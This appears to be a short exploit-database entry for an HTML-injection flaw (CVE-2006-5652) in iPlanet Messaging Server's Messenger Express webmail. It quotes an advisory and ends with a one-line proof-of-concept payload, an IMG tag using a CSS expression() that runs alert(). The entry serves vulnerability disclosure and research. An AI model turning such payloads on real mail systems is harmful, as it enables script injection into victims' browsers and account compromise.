iPlanet Messaging Server - Messenger Express Expression() HTML Injection
| EKU-ID: 34099 | CVE: CVE-2006-5652;OSVDB-32620 | OSVDB-ID: |
| Author: LegendaryZion | Published: 2006-10-31 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 34099 | CVE: CVE-2006-5652;OSVDB-32620 | OSVDB-ID: |
| Author: LegendaryZion | Published: 2006-10-31 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/20838/info
iPlanet Messaging Server Messenger Express is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary JavaScript in the victim's browser.
<IMG style="width: expression(alert('expression'));">